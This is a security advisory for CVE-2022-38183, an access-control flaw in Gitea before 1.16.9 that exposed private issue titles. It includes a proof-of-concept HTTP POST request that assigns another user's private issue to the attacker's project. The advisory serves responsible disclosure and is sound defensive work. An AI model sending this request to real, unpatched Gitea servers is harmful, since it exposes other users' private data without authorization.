usd-2022-0015 | Broken Access Control in Gitea Project Issues

Advisory ID: usd-2022-0015
Product: Gitea
Affected Version: < 1.16.9
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: Medium
Vendor URL: https://gitea.io/
Vendor Status: Fixed
Advisory Status: Closed
CVE number: CVE-2022-38183
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2022-38183

Description

Gitea is an open source project allowing users to host software development version control using Git. It was possible for users to add existing issues to projects. Due to improper access controls, attackers could assign any issue to any project in Gitea. As a result, attackers would get access to private issue titles.

Proof of Concept

The issue with ID 7 in the example below is an issue from a private repository of another user.
The project with ID 3 is the attackers project.

POST /testuser/test222/issues/projects HTTP/1.1
Host: localhost:3000
Content-Length: 85
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost:3000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: XXX
Connection: close_csrf=tvK_ourfR_QjoYg7ZTI2i6NFAQM6MTY1NTc0OTYwMTExNjc3MzMwMA&action=&issue_ids=7&id=3

The attacker can see the issue (without body text).

Fix

It is recommended to restrict access to sensitive functions or information by default.
Required access privileges should be granted explicitly by a global access control mechanism.

References

• https://cwe.mitre.org/data/definitions/284.html
• https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/

Timeline

• 2022-06-22: This vulnerability is identified by Christian Pöschl.
• 2022-06-22: First attempt to contact the vendor.
• 2022-07-01: The vendor begins investigating the vulnerability.
• 2022-07-12: Gitea 1.16.9 is released, the release notes include an acknowledgement: https://blog.gitea.io/2022/07/gitea-1.16.9-is-released/.
• 2022-07-15: The vulnerability is confirmed to be fixed by the vendor.
• 2024-05-29: This advisory is published.

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.